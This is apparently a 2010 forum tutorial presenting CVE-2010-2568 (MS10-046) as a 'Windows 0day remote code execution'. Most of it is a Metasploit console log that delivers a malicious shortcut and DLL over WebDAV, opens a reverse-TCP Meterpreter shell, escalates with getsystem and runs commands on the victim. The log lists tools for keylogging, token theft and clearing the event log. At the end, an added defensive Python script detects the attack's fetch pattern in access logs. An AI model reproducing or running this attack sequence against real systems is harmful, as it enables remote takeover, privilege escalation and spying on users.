Exploit:
CVE-2010-2568
Windows 0day remote code execution
Vulnerable OS:
* Windows XP Service Pack 3
* Windows XP Professional x64 Edition Service Pack 2
* Windows Server 2003 Service Pack 2
* Windows Server 2003 x64 Edition Service Pack 2
* Windows Server 2003 with SP2 for Itanium-based Systems
* Windows Vista Service Pack 1 and Windows Vista Service Pack 2
* Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
* Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
* Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
* Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
* Windows 7 for 32-bit Systems
* Windows 7 for x64-based Systems
* Windows Server 2008 R2 for x64-based Systems
* Windows Server 2008 R2 for Itanium-based Systems
Video:
Log:
faber@F4B3X:~$ cd msf3
faber@F4B3X:~/msf3$ sudo ./msfconsole
[sudo] password for faber:
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 596 exploits - 302 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r10551 updated today (2010.10.05)
msf > use windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > set SVRHOST 192.168.0.2
SVRHOST => 192.168.0.2
msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.0.2
LHOST => 192.168.0.2
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.2:4444
[*]
[*] Send vulnerable clients to \\192.168.0.2\fontnK\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.0.2:80/
[*] Server started.
msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Sending UNC redirect to 192.168.0.2:37247 ...
[*] Sending UNC redirect to 192.168.0.2:37248 ...
[*] Responding to WebDAV OPTIONS request from 192.168.0.2:37258
[*] Responding to WebDAV OPTIONS request from 192.168.0.2:37259
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK
[*] Sending 301 for /fontnK ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/
[*] Sending directory multistatus for /fontnK/ ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK
[*] Sending 301 for /fontnK ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/
[*] Sending directory multistatus for /fontnK/ ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/
[*] Sending directory multistatus for /fontnK/ ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK
[*] Sending 301 for /fontnK ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/
[*] Sending directory multistatus for /fontnK/ ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/desktop.ini
[*] Sending 404 for /fontnK/desktop.ini ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK
[*] Sending 301 for /fontnK ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/
[*] Sending directory multistatus for /fontnK/ ...
[*] Sending LNK file to 192.168.0.2:37259 ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/ZoGR.dll.manifest
[*] Sending 404 for /fontnK/ZoGR.dll.manifest ...
[*] Sending DLL payload 192.168.0.2:37259 ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/ZoGR.dll.123.Manifest
[*] Sending 404 for /fontnK/ZoGR.dll.123.Manifest ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/ZoGR.dll.124.Manifest
[*] Sending 404 for /fontnK/ZoGR.dll.124.Manifest ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/ZoGR.dll.2.Manifest
[*] Sending 404 for /fontnK/ZoGR.dll.2.Manifest ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK
[*] Sending 301 for /fontnK ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/
[*] Sending directory multistatus for /fontnK/ ...
[*] Sending stage (748544 bytes) to 192.168.0.2
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.2:49906) at Tue Oct 05 17:47:03 +0200 2010
sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 L1ghtman-PC\L1ghtman @ L1GHTMAN-PC 192.168.0.2:4444 -> 192.168.0.2:49906
msf exploit(ms10_046_shortcut_icon_dllloader) >
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Get as many privileges as possible
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 4).
meterpreter > shell
Process 3164 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
l1ghtman-pc\l1ghtman
C:\Windows\system32>cd C:\
cd C:\
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is BC7B-7397
Directory of C:\
10/06/2009 23:42 24 autoexec.bat
10/06/2009 23:42 10 config.sys
14/07/2009 04:37 <DIR> PerfLogs
05/10/2010 17:27 <DIR> Program Files
05/10/2010 15:53 <DIR> Users
05/10/2010 17:30 <DIR> Windows
2 File(s) 34 bytes
4 Dir(s) 14.520.733.696 bytes free
C:\>makedir
makedir
'makedir' is not recognized as an internal or external command,
operable program or batch file.
C:\>taskkill /IM notepad.exe
taskkill /IM notepad.exe
SUCCESS: Sent termination signal to the process "notepad.exe" with PID 3656.
C:\>taskmgr
taskmgr
C:\>Thanks To ClsHack.it www.realtanascosta.it www.netw0rksecurity.net ||| L1ghtman
[*] Meterpreter session 1 closed. Reason: Died
Tut by ClsHack
Video by L1ghtman
Thanks to: ClsHack.it, Netw0rkSecurity.net & RealtaNascosta.it
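The server-side log above shows the client fetching the share listing, the .lnk, a series of <name>.dll.manifest probes and then the DLL itself, which is the MS10-046 shortcut icon DLL load seen from the attacker's end. As an added example that is not part of the original post, the script below looks for the same fetch sequence from the defender's side in a proxy or WebDAV access log; the log format, client and server addresses, and file names are constructed for the demonstration.

```python
# Added example (not from the original post): flag the client-side fetch
# sequence of the MS10-046 shortcut icon DLL load in a proxy/WebDAV access log.
# Explorer fetches the .lnk, probes <dll>.manifest names, then loads the DLL
# from the same remote directory. Log format and sample lines are constructed.
from collections import defaultdict
from datetime import datetime, timedelta
import posixpath

WINDOW = timedelta(seconds=30)  # .lnk fetch and DLL fetch must be this close


def parse(line):
    """Constructed format: '<ISO timestamp> <client> <method> <host> <path> <status>'."""
    parts = line.split()
    if len(parts) != 6:
        return None  # skip lines that do not match the expected format
    ts, client, _method, host, path, _status = parts
    return {"ts": datetime.fromisoformat(ts), "client": client, "host": host,
            "path": path.lower()}  # Windows paths are case-insensitive


def find_shortcut_dll_loads(lines):
    """One alert per (client, host, directory) where a .lnk fetch is followed
    within WINDOW by a .dll fetch from the same remote directory."""
    by_key = defaultdict(list)
    for r in filter(None, map(parse, lines)):
        by_key[(r["client"], r["host"], posixpath.dirname(r["path"]))].append(r)
    alerts = []
    for (client, host, d), rs in by_key.items():
        lnks = [r for r in rs if r["path"].endswith(".lnk")]
        dlls = [r for r in rs if r["path"].endswith(".dll")]
        for lnk in lnks:
            for dll in dlls:
                if lnk["ts"] <= dll["ts"] <= lnk["ts"] + WINDOW:
                    # <dll>.manifest / <dll>.N.manifest probes corroborate a DLL load
                    probes = sum(1 for r in rs if r["path"].startswith(dll["path"])
                                 and r["path"].endswith(".manifest"))
                    alerts.append({"client": client, "host": host, "dir": d,
                                   "lnk": lnk["path"], "dll": dll["path"],
                                   "manifest_probes": probes})
    return alerts


SAMPLE_LOG = """\
2010-10-05T17:46:50 10.0.0.7 PROPFIND 198.51.100.9 /fontnK/ 207
2010-10-05T17:46:51 10.0.0.7 GET 198.51.100.9 /fontnK/icon.lnk 200
2010-10-05T17:46:52 10.0.0.7 PROPFIND 198.51.100.9 /fontnK/ZoGR.dll.manifest 404
2010-10-05T17:46:52 10.0.0.7 GET 198.51.100.9 /fontnK/ZoGR.dll 200
2010-10-05T17:46:53 10.0.0.7 PROPFIND 198.51.100.9 /fontnK/ZoGR.dll.2.Manifest 404
2010-10-05T17:50:00 10.0.0.8 GET 198.51.100.9 /docs/readme.lnk 200
2010-10-05T18:10:00 10.0.0.8 GET 198.51.100.9 /docs/helper.dll 200
""".splitlines()
```

The second client fetches a .lnk and a .dll from the same directory twenty minutes apart and is deliberately not flagged, so the window is what keeps ordinary shortcut-plus-DLL traffic out of the alerts.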